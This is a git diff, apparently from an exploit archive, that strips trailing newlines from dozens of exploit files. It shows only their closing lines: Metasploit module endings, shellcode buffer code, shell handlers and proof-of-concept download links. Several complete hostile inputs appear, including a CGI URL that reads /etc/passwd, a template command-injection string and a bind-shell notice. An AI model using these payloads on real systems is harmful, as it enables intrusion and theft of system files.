exec("/usr/openv/netbackup/bin/admincmd/bprdreq -M $buf"); -} - - +} \ No newline at end of file diff --git a/platforms/unix/local/25333.c b/platforms/unix/local/25333.c index 192b29f23..a9a76c1ff 100755 --- a/platforms/unix/local/25333.c +++ b/platforms/unix/local/25333.c @@ -81,5 +81,4 @@ int main (int argc, char **argv) { execl(_PATH, "nwprint", buf, NULL); return(0); -} - +} \ No newline at end of file diff --git a/platforms/unix/local/26753.c b/platforms/unix/local/26753.c index 693e3ef80..67b40b655 100755 --- a/platforms/unix/local/26753.c +++ b/platforms/unix/local/26753.c @@ -173,4 +173,4 @@ change_pwd(); } return 0; -} +} \ No newline at end of file diff --git a/platforms/unix/local/30017.sh b/platforms/unix/local/30017.sh index 6d2b14d79..c1ef83215 100755 --- a/platforms/unix/local/30017.sh +++ b/platforms/unix/local/30017.sh @@ -137,4 +137,4 @@ dop shell exit 0 # EOF ----------------------8<---------------------8<--------------------- +---------------------8<---------------------8<--------------------- \ No newline at end of file diff --git a/platforms/unix/local/302.c b/platforms/unix/local/302.c index c33f61f7d..df491b945 100755 --- a/platforms/unix/local/302.c +++ b/platforms/unix/local/302.c @@ -77,4 +77,4 @@ main(argc, argv) } -// milw0rm.com [2004-06-25] +// milw0rm.com [2004-06-25] \ No newline at end of file diff --git a/platforms/unix/remote/14489.c b/platforms/unix/remote/14489.c index c75eb6df2..90fb46dd0 100755 --- a/platforms/unix/remote/14489.c +++ b/platforms/unix/remote/14489.c @@ -145,5 +145,4 @@ else } -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/16320.rb b/platforms/unix/remote/16320.rb index 655686db7..5495bfe8c 100755 --- a/platforms/unix/remote/16320.rb +++ b/platforms/unix/remote/16320.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/16866.rb b/platforms/unix/remote/16866.rb index a67c3aca6..119a49ffb 100755 --- a/platforms/unix/remote/16866.rb +++ b/platforms/unix/remote/16866.rb @@ -213,4 +213,4 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c" end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/16964.rb b/platforms/unix/remote/16964.rb index 0d2ba54c9..5e71253cb 100755 --- a/platforms/unix/remote/16964.rb +++ b/platforms/unix/remote/16964.rb @@ -158,4 +158,4 @@ class Metasploit3 < Msf::Exploit::Remote "RandomIV" + iv + c.update(data) + c.final end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/17199.rb b/platforms/unix/remote/17199.rb index 2a172b7b3..7a254b952 100755 --- a/platforms/unix/remote/17199.rb +++ b/platforms/unix/remote/17199.rb @@ -76,5 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/platforms/unix/remote/17491.rb b/platforms/unix/remote/17491.rb index 2ab6da8fd..e31ef8ca4 100755 --- a/platforms/unix/remote/17491.rb +++ b/platforms/unix/remote/17491.rb @@ -119,5 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(s) end -end - +end \ No newline at end of file diff --git a/platforms/unix/remote/19101.c b/platforms/unix/remote/19101.c index 5d682a15a..02b707d97 100755 --- a/platforms/unix/remote/19101.c +++ b/platforms/unix/remote/19101.c @@ -289,4 +289,4 @@ void make_file(char *fname, char *buf, int type) { } xdr_destroy(&xdrm); close(fd); -} +} \ No newline at end of file diff --git a/platforms/unix/remote/19478.c b/platforms/unix/remote/19478.c index 02dcee6df..67b879394 100755 --- a/platforms/unix/remote/19478.c +++ b/platforms/unix/remote/19478.c @@ -155,6 +155,4 @@ int main(int argc,char **argv) execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL); } ---------------------------------------------------------------------- -end amd-ex.c - - +end amd-ex.c \ No newline at end of file diff --git a/platforms/unix/remote/19479.c b/platforms/unix/remote/19479.c index 4ae3188a2..c8a4b2545 100755 --- a/platforms/unix/remote/19479.c +++ b/platforms/unix/remote/19479.c @@ -304,48 +304,4 @@ amqproc_mount_1(voidp argp, CLIENT *clnt) } printf ( "exploit failed\n"); return (&res); -} - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +} \ No newline at end of file diff --git a/platforms/unix/remote/19645.c b/platforms/unix/remote/19645.c index e062bb995..a0dfcf7cc 100755 --- a/platforms/unix/remote/19645.c +++ b/platforms/unix/remote/19645.c @@ -342,5 +342,4 @@ term (int p, int c) } -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/19646.pl b/platforms/unix/remote/19646.pl index 170fbbc4b..31c9a8020 100755 --- a/platforms/unix/remote/19646.pl +++ b/platforms/unix/remote/19646.pl @@ -55,4 +55,4 @@ for ($i=800+length($shell) + 2; $i < $buflen - 4; $i += 4) printf STDOUT "$buf\n"; -# EndOfFile +# EndOfFile \ No newline at end of file diff --git a/platforms/unix/remote/19690.txt b/platforms/unix/remote/19690.txt index ac902396a..cf577e1df 100755 --- a/platforms/unix/remote/19690.txt +++ b/platforms/unix/remote/19690.txt @@ -76,5 +76,4 @@ Links: Greets: ^moo^, yowie, cr, duke, silvio, n1ck, - w00w00, and last but not least ADM - + w00w00, and last but not least ADM \ No newline at end of file diff --git a/platforms/unix/remote/19847.c b/platforms/unix/remote/19847.c index 3a315085d..2ed3d5b10 100755 --- a/platforms/unix/remote/19847.c +++ b/platforms/unix/remote/19847.c @@ -218,5 +218,4 @@ main(int argc, char *argv[]) close(sockfd); return 0; -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/19848.pm b/platforms/unix/remote/19848.pm index 9d07f2b0e..a7d7db80a 100755 --- a/platforms/unix/remote/19848.pm +++ b/platforms/unix/remote/19848.pm @@ -190,4 +190,4 @@ sub PayloadSPARC { $buf = substr($sc, 0, 1032 - 680) . $sc . pack("N", $ret - 32) x 15 . pack("N", $ret) x 3; return $buf; -} +} \ No newline at end of file diff --git a/platforms/unix/remote/19849.pm b/platforms/unix/remote/19849.pm index 3c7c3e4fc..5cd55a7db 100755 --- a/platforms/unix/remote/19849.pm +++ b/platforms/unix/remote/19849.pm @@ -222,4 +222,4 @@ sub PayloadPrependEncoder { { return "\x9c\x23\xa3\xe8"; } -} +} \ No newline at end of file diff --git a/platforms/unix/remote/20030.c b/platforms/unix/remote/20030.c index 9709cee92..b314e6653 100755 --- a/platforms/unix/remote/20030.c +++ b/platforms/unix/remote/20030.c @@ -656,5 +656,4 @@ addr),magic_str,"%p"); printf(RED"Press ^\\ to leave shell"NORM"\n"); process_possibly_rooted(sock); return 0; -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/20150.c b/platforms/unix/remote/20150.c index cc68905e0..1f23836e0 100755 --- a/platforms/unix/remote/20150.c +++ b/platforms/unix/remote/20150.c @@ -44,4 +44,4 @@ void main( int argc, char *argv[] ) putchar(code_buf[i]); } printf("\r\n\r\n"); -} +} \ No newline at end of file diff --git a/platforms/unix/remote/20205.rb b/platforms/unix/remote/20205.rb index 6ecb4ac41..6d1881f93 100755 --- a/platforms/unix/remote/20205.rb +++ b/platforms/unix/remote/20205.rb @@ -116,5 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/unix/remote/20395.c b/platforms/unix/remote/20395.c index dd8b6947c..7d6122de3 100755 --- a/platforms/unix/remote/20395.c +++ b/platforms/unix/remote/20395.c @@ -85,4 +85,4 @@ buffer[SIZE - 1] = 0; printf("USER %s\n", buffer); -} +} \ No newline at end of file diff --git a/platforms/unix/remote/20414.c b/platforms/unix/remote/20414.c index 6f4242ddb..1740b7372 100755 --- a/platforms/unix/remote/20414.c +++ b/platforms/unix/remote/20414.c @@ -366,4 +366,4 @@ id; uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy) -*/ +*/ \ No newline at end of file diff --git a/platforms/unix/remote/20462.txt b/platforms/unix/remote/20462.txt index 0ffa0d017..a0f4c54fc 100755 --- a/platforms/unix/remote/20462.txt +++ b/platforms/unix/remote/20462.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/2056/info Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Unpatched version of Hylafax ship with an insecure script, faxsurvey, which allows remote command execution with the privileges of the web server process. This can be exploited simply by passing the command as a parameter to the script - see exploit. Consequences could include web site defacements, exploiting locally accessible vulnerabilities to gain further privileges, etc. -http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd +http://target.host/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd \ No newline at end of file diff --git a/platforms/unix/remote/20490.c b/platforms/unix/remote/20490.c index 274de8f28..faa028119 100755 --- a/platforms/unix/remote/20490.c +++ b/platforms/unix/remote/20490.c @@ -643,4 +643,4 @@ exit_helot: fprintf(stderr, "\ncleaning up...\n"); free(qname); free(hostname); free(inaddrstr); close(sd); exit(-1); -} +} \ No newline at end of file diff --git a/platforms/unix/remote/20495.c b/platforms/unix/remote/20495.c index 5417c61c5..6596e518a 100755 --- a/platforms/unix/remote/20495.c +++ b/platforms/unix/remote/20495.c @@ -223,5 +223,4 @@ int main(int argc,char **argv){ close(clnsock); close(s); close(s2); -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/20599.sh b/platforms/unix/remote/20599.sh index e86d9791f..2c804ac78 100755 --- a/platforms/unix/remote/20599.sh +++ b/platforms/unix/remote/20599.sh @@ -100,5 +100,4 @@ echo "talking to remote" # cleanup cd / rm -rf $TD -echo "done." - +echo "done." \ No newline at end of file diff --git a/platforms/unix/remote/20615.txt b/platforms/unix/remote/20615.txt index b45489bf0..ded5b755c 100755 --- a/platforms/unix/remote/20615.txt +++ b/platforms/unix/remote/20615.txt @@ -33,4 +33,4 @@ foreach passwd [split [read $tryPass] "\n"] { expect "#" { puts "password is $passwd\n" ; exit } set id [exp_pid] exec kill -INT $id -} +} \ No newline at end of file diff --git a/platforms/unix/remote/20617.c b/platforms/unix/remote/20617.c index f62fe091a..98c85a463 100755 --- a/platforms/unix/remote/20617.c +++ b/platforms/unix/remote/20617.c @@ -292,6 +292,4 @@ int main(int argc,char *argv[]) system(ssh); _exit(0); -} - - +} \ No newline at end of file diff --git a/platforms/unix/remote/20646.c b/platforms/unix/remote/20646.c index 06527d3b8..754b3fd48 100755 --- a/platforms/unix/remote/20646.c +++ b/platforms/unix/remote/20646.c @@ -68,5 +68,4 @@ int main(int argc, char **argv) send(sock, buf, sizeof(buf), 0); close(sock); fprintf(stdout, "Data sent\n\n"); -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/20730.c b/platforms/unix/remote/20730.c index 70324549c..235e511d6 100755 --- a/platforms/unix/remote/20730.c +++ b/platforms/unix/remote/20730.c @@ -288,4 +288,4 @@ diff -c -r fragrouter-1.6.orig/misc.h fragrouter-1.6/misc.h + ELEM *misc_ipfilter(u_char *pkt, int pktlen); + - #endif /* MISC_H */ + #endif /* MISC_H */ \ No newline at end of file diff --git a/platforms/unix/remote/20993.c b/platforms/unix/remote/20993.c index daf07937c..1874b9a29 100755 --- a/platforms/unix/remote/20993.c +++ b/platforms/unix/remote/20993.c @@ -155,4 +155,4 @@ char *str; { perror(str); exit(4); -} +} \ No newline at end of file diff --git a/platforms/unix/remote/21018.c b/platforms/unix/remote/21018.c index da8cc61ee..4b61caf13 100755 --- a/platforms/unix/remote/21018.c +++ b/platforms/unix/remote/21018.c @@ -445,4 +445,4 @@ be redistrubuted. | | If there is anything below the next line someone is not following the rules. --zen-parse -************************************END*****************************/ +************************************END*****************************/ \ No newline at end of file diff --git a/platforms/unix/remote/21021.pl b/platforms/unix/remote/21021.pl index ad9b236a2..57733695e 100755 --- a/platforms/unix/remote/21021.pl +++ b/platforms/unix/remote/21021.pl @@ -80,5 +80,4 @@ sub bannerGrab socket(OUT, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || warn "$!\n"; connect(OUT, $haddr) ; return OUT; -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/21064.c b/platforms/unix/remote/21064.c index c62fdef48..3d86a13c4 100755 --- a/platforms/unix/remote/21064.c +++ b/platforms/unix/remote/21064.c @@ -60,4 +60,4 @@ int main(void) printf("%d %d\r\n", i, *sc++); printf(".\r\n"); /* POP data term */ return 0; -} +} \ No newline at end of file diff --git a/platforms/unix/remote/21088.pl b/platforms/unix/remote/21088.pl index dee9a299f..b722453cf 100755 --- a/platforms/unix/remote/21088.pl +++ b/platforms/unix/remote/21088.pl @@ -25,4 +25,4 @@ $junk = "X" x 2048; $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n"; $remote->autoflush(1); print $remote $killme; -close $remote; +close $remote; \ No newline at end of file diff --git a/platforms/unix/remote/21089.c b/platforms/unix/remote/21089.c index 4e93b3dab..521bd1dd4 100755 --- a/platforms/unix/remote/21089.c +++ b/platforms/unix/remote/21089.c @@ -273,7 +273,4 @@ Ns_HtuuEncode(unsigned char *bufin, unsigned int nbytes, char * bufcoded) } *outptr = '\0'; return (outptr - bufcoded); -} - - - +} \ No newline at end of file diff --git a/platforms/unix/remote/21128.c b/platforms/unix/remote/21128.c index 8bbc2af47..578bff974 100755 --- a/platforms/unix/remote/21128.c +++ b/platforms/unix/remote/21128.c @@ -434,5 +434,4 @@ else fputs("Failed.\n",stderr); exit(-1); -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/21215.c b/platforms/unix/remote/21215.c index 254d1d6c0..a7e07817f 100755 --- a/platforms/unix/remote/21215.c +++ b/platforms/unix/remote/21215.c @@ -102,5 +102,4 @@ main(int argc,char *argv[]) dump_recv(sockfd); close(sockfd); -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/21297.c b/platforms/unix/remote/21297.c index 3eae876e1..376dc0925 100755 --- a/platforms/unix/remote/21297.c +++ b/platforms/unix/remote/21297.c @@ -729,6 +729,4 @@ ddr += step ) } return 1; -} - - +} \ No newline at end of file diff --git a/platforms/unix/remote/21363.c b/platforms/unix/remote/21363.c index 37427d8cb..f087ed20b 100755 --- a/platforms/unix/remote/21363.c +++ b/platforms/unix/remote/21363.c @@ -479,4 +479,4 @@ void handleshell(int sock) fprintf(stderr, "$ "); } } -} +} \ No newline at end of file diff --git a/platforms/unix/remote/21578.txt b/platforms/unix/remote/21578.txt index 8a8622b97..da7ebc526 100755 --- a/platforms/unix/remote/21578.txt +++ b/platforms/unix/remote/21578.txt @@ -121,4 +121,4 @@ uid=0(root) gid=0(wheel) groups=0(wheel) + return; debug2("input_userauth_info_req: num_prompts %d", num_prompts); - for (i = 0; i < num_prompts; i++) { + for (i = 0; i < num_prompts; i++) { \ No newline at end of file diff --git a/platforms/unix/remote/21671.c b/platforms/unix/remote/21671.c index 1513b6692..8a588b8fe 100755 --- a/platforms/unix/remote/21671.c +++ b/platforms/unix/remote/21671.c @@ -1434,6 +1434,4 @@ int main(int argc, char* argv[]) return 0; } -/* It isn't 0day */ - - +/* It isn't 0day */ \ No newline at end of file diff --git a/platforms/unix/remote/21849.rb b/platforms/unix/remote/21849.rb index d0655cdd3..775beedd7 100755 --- a/platforms/unix/remote/21849.rb +++ b/platforms/unix/remote/21849.rb @@ -121,4 +121,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/21851.rb b/platforms/unix/remote/21851.rb index 0fe5fecec..f2d863988 100755 --- a/platforms/unix/remote/21851.rb +++ b/platforms/unix/remote/21851.rb @@ -154,4 +154,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/21852.rb b/platforms/unix/remote/21852.rb index dc46e7eec..5db6ddad9 100755 --- a/platforms/unix/remote/21852.rb +++ b/platforms/unix/remote/21852.rb @@ -112,4 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/21974.pl b/platforms/unix/remote/21974.pl index eba673a10..bc472abf3 100755 --- a/platforms/unix/remote/21974.pl +++ b/platforms/unix/remote/21974.pl @@ -53,7 +53,4 @@ if (fork() == 0) { wait; sleep 3; print "Connecting ...\n"; -exec("/usr/bin/telnet", $remote, 7350); - - - +exec("/usr/bin/telnet", $remote, 7350); \ No newline at end of file diff --git a/platforms/unix/remote/22036.pl b/platforms/unix/remote/22036.pl index 020824206..7da7bbea0 100755 --- a/platforms/unix/remote/22036.pl +++ b/platforms/unix/remote/22036.pl @@ -99,5 +99,4 @@ close O; system("/tmp/$shellcode", "..$dir/$file/"); -exec("/tmp/boomsh"); - +exec("/tmp/boomsh"); \ No newline at end of file diff --git a/platforms/unix/remote/22292.pl b/platforms/unix/remote/22292.pl index 1be85c423..23b19151b 100755 --- a/platforms/unix/remote/22292.pl +++ b/platforms/unix/remote/22292.pl @@ -26,4 +26,4 @@ for ($i += length($shellcode); $i < $len; $i += 4) { } local($ENV{'EGG'}) = $buffer; $cakeman = "ABC" . $new_ret x 247 ; -exec("f-prot $cakeman");</PRE></BODY></HTML> +exec("f-prot $cakeman");</PRE></BODY></HTML> \ No newline at end of file diff --git a/platforms/unix/remote/22313.c b/platforms/unix/remote/22313.c index 905085805..ddf07a82e 100755 --- a/platforms/unix/remote/22313.c +++ b/platforms/unix/remote/22313.c @@ -491,4 +491,4 @@ int main(int argc,char **argv){ } } } -} +} \ No newline at end of file diff --git a/platforms/unix/remote/22314.c b/platforms/unix/remote/22314.c index f7ba86739..9e05df5f5 100755 --- a/platforms/unix/remote/22314.c +++ b/platforms/unix/remote/22314.c @@ -395,6 +395,4 @@ bfstart: bf+=4; goto bfstart; } -} - - +} \ No newline at end of file diff --git a/platforms/unix/remote/22449.c b/platforms/unix/remote/22449.c index 208fb5ae3..321f8179a 100755 --- a/platforms/unix/remote/22449.c +++ b/platforms/unix/remote/22449.c @@ -476,5 +476,4 @@ void banrl() _______________________________________________ Get your free email from http://www.hackermail.com -Powered by Outblaze - +Powered by Outblaze \ No newline at end of file diff --git a/platforms/unix/remote/22450.c b/platforms/unix/remote/22450.c index 8ab804e45..8f4fffb37 100755 --- a/platforms/unix/remote/22450.c +++ b/platforms/unix/remote/22450.c @@ -420,8 +420,4 @@ void banrl() exploit\n"); fprintf(stdout," by Xpl0 17Elz.\n\n"); -} - - - - +} \ No newline at end of file diff --git a/platforms/unix/remote/22468.c b/platforms/unix/remote/22468.c index 0d26575f3..174bf81c2 100755 --- a/platforms/unix/remote/22468.c +++ b/platforms/unix/remote/22468.c @@ -561,4 +561,4 @@ void usage(char *p_name) ** # ** -- ** -*/ +*/ \ No newline at end of file diff --git a/platforms/unix/remote/22469.c b/platforms/unix/remote/22469.c index 0c3a663ec..98bc51d83 100755 --- a/platforms/unix/remote/22469.c +++ b/platforms/unix/remote/22469.c @@ -268,6 +268,4 @@ main (int argc, char * argv[]) } fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n"); return 0; -} - - +} \ No newline at end of file diff --git a/platforms/unix/remote/22470.c b/platforms/unix/remote/22470.c index 8bc9ff41a..c6cdd564d 100755 --- a/platforms/unix/remote/22470.c +++ b/platforms/unix/remote/22470.c @@ -783,4 +783,4 @@ main (int argc,char *argv[]) sleep(2); exit(0); } -} +} \ No newline at end of file diff --git a/platforms/unix/remote/22699.c b/platforms/unix/remote/22699.c index 7bafff04d..78f0ee667 100755 --- a/platforms/unix/remote/22699.c +++ b/platforms/unix/remote/22699.c @@ -269,5 +269,4 @@ int main(int argc, char **argv) { return 0; -} - +} \ No newline at end of file diff --git a/platforms/unix/remote/22964.c b/platforms/unix/remote/22964.c index 97fb9acbf..9029cb08a 100755 --- a/platforms/unix/remote/22964.c +++ b/platforms/unix/remote/22964.c @@ -542,4 +542,4 @@ int main(int argc, char **argv) shell(opt); return 0; -} +} \ No newline at end of file diff --git a/platforms/unix/remote/23156.rb b/platforms/unix/remote/23156.rb index ffc71e806..e31e610bc 100755 --- a/platforms/unix/remote/23156.rb +++ b/platforms/unix/remote/23156.rb @@ -205,4 +205,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(c.lsock) if c end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/23227.rb b/platforms/unix/remote/23227.rb index 69d2a25dc..98e12778d 100755 --- a/platforms/unix/remote/23227.rb +++ b/platforms/unix/remote/23227.rb @@ -152,4 +152,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/23580.rb b/platforms/unix/remote/23580.rb index 9abe7270c..96e1d3654 100755 --- a/platforms/unix/remote/23580.rb +++ b/platforms/unix/remote/23580.rb @@ -235,5 +235,4 @@ end %MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}% -=end - +=end \ No newline at end of file diff --git a/platforms/unix/remote/24310.rb b/platforms/unix/remote/24310.rb index c770a17bf..e3b305314 100755 --- a/platforms/unix/remote/24310.rb +++ b/platforms/unix/remote/24310.rb @@ -144,5 +144,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/unix/remote/24455.rb b/platforms/unix/remote/24455.rb index 8a7758744..7a26f9a4b 100755 --- a/platforms/unix/remote/24455.rb +++ b/platforms/unix/remote/24455.rb @@ -346,4 +346,4 @@ class Metasploit3 < Msf::Exploit::Remote # Accessor for our UDP socket attr_accessor :udp_sock -end +end \ No newline at end of file diff --git a/platforms/unix/remote/25624.c b/platforms/unix/remote/25624.c index 424bde79a..5403b4529 100755 --- a/platforms/unix/remote/25624.c +++ b/platforms/unix/remote/25624.c @@ -74,7 +74,4 @@ void changeport(char *code, int port, int offset) { /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); -} - - - +} \ No newline at end of file diff --git a/platforms/unix/remote/25625.c b/platforms/unix/remote/25625.c index 5e6cab5ee..4b295ed84 100755 --- a/platforms/unix/remote/25625.c +++ b/platforms/unix/remote/25625.c @@ -123,4 +123,4 @@ void changeport(char *code, int port, int offset) { - + \ No newline at end of file diff --git a/platforms/unix/remote/30835.sh b/platforms/unix/remote/30835.sh index a1dffcf3d..30ddf85ad 100755 --- a/platforms/unix/remote/30835.sh +++ b/platforms/unix/remote/30835.sh @@ -24,4 +24,4 @@ then echo "$i is VULNERABLE!" fi -done +done \ No newline at end of file diff --git a/platforms/unix/remote/31820.pl b/platforms/unix/remote/31820.pl index 999353ff6..c09faaeda 100755 --- a/platforms/unix/remote/31820.pl +++ b/platforms/unix/remote/31820.pl @@ -184,5 +184,4 @@ $sock->send ( sleep( 3 ); close( $sock ); -print "[+] Done. Now check for a bind shell on $ip:4444!\n"; - +print "[+] Done. Now check for a bind shell on $ip:4444!\n"; \ No newline at end of file diff --git a/platforms/unix/remote/32885.rb b/platforms/unix/remote/32885.rb index 4483d0b42..34d2ccf1e 100755 --- a/platforms/unix/remote/32885.rb +++ b/platforms/unix/remote/32885.rb @@ -98,4 +98,4 @@ class Metasploit3 < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/platforms/unix/remote/34621.c b/platforms/unix/remote/34621.c index 3253c783e..4783548b7 100755 --- a/platforms/unix/remote/34621.c +++ b/platforms/unix/remote/34621.c @@ -103,7 +103,4 @@ printf("Content-Length: %d\r\n",strlen(body)); printf("\r\n"); printf("%s",body); return; -} - - - +} \ No newline at end of file diff --git a/platforms/unix/remote/9914.rb b/platforms/unix/remote/9914.rb index 004d6768a..b1b841897 100755 --- a/platforms/unix/remote/9914.rb +++ b/platforms/unix/remote/9914.rb @@ -76,4 +76,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/unix/webapps/9861.rb b/platforms/unix/webapps/9861.rb index 86cac2ace..aa2fd6cb7 100755 --- a/platforms/unix/webapps/9861.rb +++ b/platforms/unix/webapps/9861.rb @@ -112,4 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote print_line(res.body) end -end +end \ No newline at end of file diff --git a/platforms/unixware/local/21284.c b/platforms/unixware/local/21284.c index 79797e169..61c9ff61d 100755 --- a/platforms/unixware/local/21284.c +++ b/platforms/unixware/local/21284.c @@ -122,4 +122,4 @@ main() char *a; a = getenv("EGG"); printf ("e=%p\n", a); - } + } \ No newline at end of file diff --git a/platforms/win_x86-64/dos/18275.txt b/platforms/win_x86-64/dos/18275.txt index 579a5a26a..3421e841d 100755 --- a/platforms/win_x86-64/dos/18275.txt +++ b/platforms/win_x86-64/dos/18275.txt @@ -42,5 +42,4 @@ fffff880`08b51c20 00000000`73f003fa : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13 00000000`0021dd78 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x73f003fa ----#--- - +---#--- \ No newline at end of file diff --git a/platforms/win_x86-64/dos/39043.txt b/platforms/win_x86-64/dos/39043.txt index 69de5cd2e..afbd77fe5 100755 --- a/platforms/win_x86-64/dos/39043.txt +++ b/platforms/win_x86-64/dos/39043.txt @@ -21,5 +21,4 @@ A sample swf and fla are attached. Note that this PoC only works on 64-bit platf Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39043.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39043.zip \ No newline at end of file diff --git a/platforms/win_x86-64/dos/39072.txt b/platforms/win_x86-64/dos/39072.txt index 73ae44998..c2660fe29 100755 --- a/platforms/win_x86-64/dos/39072.txt +++ b/platforms/win_x86-64/dos/39072.txt @@ -18,5 +18,4 @@ A sample swf and fla are attached. Note that these PoCs will not cause a crash. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39072.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39072.zip \ No newline at end of file diff --git a/platforms/win_x86-64/dos/39221.txt b/platforms/win_x86-64/dos/39221.txt index 45a381c7b..452b5077c 100755 --- a/platforms/win_x86-64/dos/39221.txt +++ b/platforms/win_x86-64/dos/39221.txt @@ -4,5 +4,4 @@ The attached file causes a use-after-free when calling the stage setter. The PoC Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39221.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39221.zip \ No newline at end of file diff --git a/platforms/win_x86-64/dos/39712.txt b/platforms/win_x86-64/dos/39712.txt index 5c3797fb5..09927b823 100755 --- a/platforms/win_x86-64/dos/39712.txt +++ b/platforms/win_x86-64/dos/39712.txt @@ -4,5 +4,4 @@ The attached testcases crashes Windows 7 64-bit while attempting to write to an Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39712.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39712.zip \ No newline at end of file diff --git a/platforms/win_x86-64/dos/40196.txt b/platforms/win_x86-64/dos/40196.txt index b8f40e6d5..b7a6934a5 100755 --- a/platforms/win_x86-64/dos/40196.txt +++ b/platforms/win_x86-64/dos/40196.txt @@ -23,5 +23,4 @@ Built using Microsoft Visual C++ 12.0 build 40629 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40196.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40196.zip \ No newline at end of file diff --git a/platforms/win_x86-64/dos/41547.py b/platforms/win_x86-64/dos/41547.py index 50fdf1c53..aab4400a9 100755 --- a/platforms/win_x86-64/dos/41547.py +++ b/platforms/win_x86-64/dos/41547.py @@ -39,4 +39,4 @@ buffer+="B"*4096 # This is just to prove that the stack will also contain any bu s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,port)) s.send(buffer) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/win_x86-64/local/20861.txt b/platforms/win_x86-64/local/20861.txt index bd371a7ef..bfe4c23fa 100755 --- a/platforms/win_x86-64/local/20861.txt +++ b/platforms/win_x86-64/local/20861.txt @@ -2,5 +2,4 @@ Source: http://packetstormsecurity.org/files/115908/sysret.rar This is proof of concept code that demonstrates the Microsoft Windows kernel (Intel/x64) SYSRET vulnerability as described in MS12-042. The shellcode disables code signing and will grant NT SYSTEM privileges to a specified application or already running process. -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar - +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20861.rar \ No newline at end of file diff --git a/platforms/win_x86-64/local/39035.txt b/platforms/win_x86-64/local/39035.txt index 808193fa8..dff455fc2 100755 --- a/platforms/win_x86-64/local/39035.txt +++ b/platforms/win_x86-64/local/39035.txt @@ -8,5 +8,4 @@ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip \ No newline at end of file diff --git a/platforms/win_x86-64/local/39525.py b/platforms/win_x86-64/local/39525.py index b887ecbdf..c2b4a9bf9 100755 --- a/platforms/win_x86-64/local/39525.py +++ b/platforms/win_x86-64/local/39525.py @@ -340,7 +340,4 @@ if __name__ == "__main__": main() else: print "Please use a 64 bit version of python" - sys.exit() - - - + sys.exit() \ No newline at end of file diff --git a/platforms/win_x86-64/local/39984.txt b/platforms/win_x86-64/local/39984.txt index e67d4948b..6ca9a43b4 100755 --- a/platforms/win_x86-64/local/39984.txt +++ b/platforms/win_x86-64/local/39984.txt @@ -60,4 +60,4 @@ C:\Program Files (x86)\0patch\Agent\0patchServicex64.exe NT AUTHORITY\SYSTEM:(ID BUILTIN\Users:(ID)R -C:\> +C:\> \ No newline at end of file diff --git 